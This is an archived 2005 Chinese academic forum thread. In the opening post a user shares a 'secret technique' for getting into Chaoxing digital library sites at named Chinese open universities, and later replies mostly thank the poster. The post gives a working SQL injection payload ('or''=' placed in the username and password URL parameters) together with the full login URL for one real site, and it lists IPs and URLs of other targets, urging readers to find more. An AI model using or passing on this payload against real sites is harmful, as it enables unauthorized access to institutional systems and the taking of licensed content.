版块导航: 正在加载中...

登录注册

应《网络安全法》要求，自2017年10月1日起，未进行实名认证将不得使用互联网跟帖服务。为保障您的帐号能够正常使用，请尽快对帐号进行手机号验证，感谢您的理解与支持！

24小时热门版块排行榜

返回列表

当前主题已经存档。

applepie119

木虫 (著名写手)

应助: 0 (幼儿园)
金币: 2997.2
红花: 11
帖子: 1124
在线: 22.1小时
虫号: 90394
注册: 2005-09-01
专业: 临床药理

[交流] [分享]新发现利用asp漏洞进超星图书馆秘技

[分享]新发现利用asp漏洞进超星图书馆秘技
这是在看了论坛上的一个帖子后测试找出来的，特向菜鸟们推荐，
希望对大家有所帮助！
深圳广播电视大学数字图书馆
http://218.17.219.22/bookhtm/index.asp
搜索需要输入用户名、密码
我们可以构造查询条件，突破限制
做法如下：
1.随便输入学号、密码，登陆，例如：学号=1,密码=1.这时会出现“此用户不存在！返回”
ie地址栏中地址为：http://218.17.219.22/bookhtm/sq/ ... ;B1.x=31&B1.y=6
2.修改地址进入：
将上面地址中user=1&mima=1改为:user='or''='&mima='or''='
或者user='or'1'='1&mima='or'1'='1 也可
即：http://218.17.219.22/bookhtm/sq/load.asp?user='or''='&mima='or''='&B1.x=31&B1.y=6
就是登陆地址了。
3.登陆后可以随便看了
同样的道理利用这个漏洞，可以登陆另外几个需要输入用户名、密码的站点,需要输入的地方都输上'or''='
如：驻马店电大：http://www.zmdtvu.net/dabookhtm/
铜陵电大：http://218.22.180.149/index.asp其他的自己好好发掘吧，^_^

回复此楼

» 猜你喜欢

求调剂已经有4人回复
一志愿西北大学总分282 英语一62 求调剂已经有3人回复
调剂310 已经有4人回复
北科281学硕材料求调剂已经有16人回复
一志愿上海交大生物与医药专硕324分，求调剂已经有6人回复
一志愿哈工大，085400，320，求调剂已经有4人回复
316求调剂已经有9人回复
085600 材料与化工 329分求调剂已经有8人回复
0856求调剂已经有6人回复
299求调剂已经有4人回复

1楼 2005-09-04 12:30:18

已阅回复此楼关注TA 给TA发消息送TA红花 TA的回帖

cyjcyj

木虫 (正式写手)

应助: 0 (幼儿园)
金币: 2682.8
帖子: 315
在线: 62.5小时
虫号: 26234
注册: 2003-10-15
专业: 群落生态学

0.5

非常好。谢谢。

回复此楼

2楼2005-09-04 15:59:00

已阅回复此楼关注TA 给TA发消息送TA红花 TA的回帖

水★火

0.5

3楼2005-09-04 21:49:19

已阅回复此楼关注TA 给TA发消息送TA红花 TA的回帖

jaylee

木虫 (小有名气)

应助: 0 (幼儿园)
金币: 2059.2
帖子: 171
在线: 13.3小时
虫号: 5772
注册: 2003-04-03
专业: 医学超声与声学造影剂

0.5

好像不是新技巧

回复此楼

4楼2005-09-04 22:38:39

已阅回复此楼关注TA 给TA发消息送TA红花 TA的回帖

superjdhxc

1

5楼2005-09-06 11:04:14

已阅回复此楼关注TA 给TA发消息送TA红花 TA的回帖

cruise

1

6楼2005-09-06 12:00:27

已阅回复此楼关注TA 给TA发消息送TA红花 TA的回帖

onefan

应助: (幼儿园)
在线:
虫号: 49871

0.5

thank you very much!

赞一下

回复此楼

7楼2005-09-10 20:45:41

已阅回复此楼关注TA 给TA发消息送TA红花 TA的回帖

728728

木虫 (正式写手)

应助: 4 (幼儿园)
金币: 4940.1
散金: 239
帖子: 519
在线: 397.7小时
虫号: 92818
注册: 2005-09-11
性别: GG
专业: 可再生与替代能源利用中的

0.5

very good

回复此楼

8楼2005-09-15 23:32:21

已阅回复此楼关注TA 给TA发消息送TA红花 TA的回帖

minister6

新虫 (初入文坛)

应助: 0 (幼儿园)
金币: 2.9
帖子: 2
在线: 10分钟
虫号: 62400
注册: 2005-03-16

1

thank you!!!!!!!!

赞一下

回复此楼

9楼2005-10-07 13:20:51

已阅回复此楼关注TA 给TA发消息送TA红花 TA的回帖

hmmcsu161

木虫 (小有名气)

应助: 0 (幼儿园)
金币: 2030.9
帖子: 101
在线: 4.5小时
虫号: 45266
注册: 2004-05-08
专业: 科学学与科技管理

1

good

回复此楼

10楼2005-10-08 15:28:00

已阅回复此楼关注TA 给TA发消息送TA红花 TA的回帖

相关版块跳转我要订阅楼主 applepie119 的主题更新

返回列表

最具人气热帖推荐 [查看全部]		作者	回/看	最后发表

[考研] 316求调剂 +9	梁茜雯 2026-03-19	9/450	2026-03-25 23:01 by peike
[考研] 292求调剂 +6	鹅鹅鹅额额额额� 2026-03-25	7/350	2026-03-25 22:04 by 无际的草原
[考研] 求调剂 +3	QiMing7 2026-03-25	3/150	2026-03-25 21:13 by 给你你注意休息
[考研] 293求调剂 +7	加一一九 2026-03-24	7/350	2026-03-25 12:02 by userper
[考研] 086003食品工程求调剂 +6	淼淼111 2026-03-24	6/300	2026-03-25 10:29 by 3Strings
[考研] 材料调剂 +6	匹克i 2026-03-23	6/300	2026-03-24 21:09 by greychen00
[考研] 291求调剂 +3	HanBeiNingZC 2026-03-24	3/150	2026-03-24 16:34 by barlinike
[考研] 300求调剂，材料科学英一数二 +5	leaflight 2026-03-24	5/250	2026-03-24 16:25 by laoshidan
[考研] 一志愿山东大学药学学硕求调剂 +3	开开心心没烦恼 2026-03-23	4/200	2026-03-24 00:06 by 开开心心没烦恼
[考研] 333求调剂 +3	ALULU4408 2026-03-23	3/150	2026-03-23 19:04 by macy2011
[考研] 350求调剂 +6	weudhdk 2026-03-19	6/300	2026-03-23 15:47 by tangyuan0840221
[考研] 276求调剂 +3	YNRYG 2026-03-21	4/200	2026-03-23 08:31 by 醉在风里
[考研] 085600材料与化工306 +4	z1z2z3879 2026-03-21	4/200	2026-03-21 23:44 by ms629
[考研] 求调剂 +4	要好好无聊 2026-03-21	4/200	2026-03-21 18:57 by 学员8dgXkO
[考研] 296求调剂 +4	www_q 2026-03-20	4/200	2026-03-21 17:26 by 学员8dgXkO
[考研] 266求调剂 +3	哇呼哼呼哼 2026-03-20	3/150	2026-03-21 16:46 by barlinike
[考研] 279求调剂 +5	红衣隐官 2026-03-21	5/250	2026-03-21 14:59 by lature00
[考研] 22408 344分求调剂一志愿华电计算机技术 +4	solanXXX 2026-03-20	4/200	2026-03-20 23:49 by alg094825
[考研] 一志愿南京航空航天大学大学，080500材料科学与工程学硕 +5	@taotao 2026-03-20	5/250	2026-03-20 20:16 by JourneyLucky
[考研] 材料考研调剂 +3	xwt。 2026-03-19	3/150	2026-03-19 11:22 by w沐阳w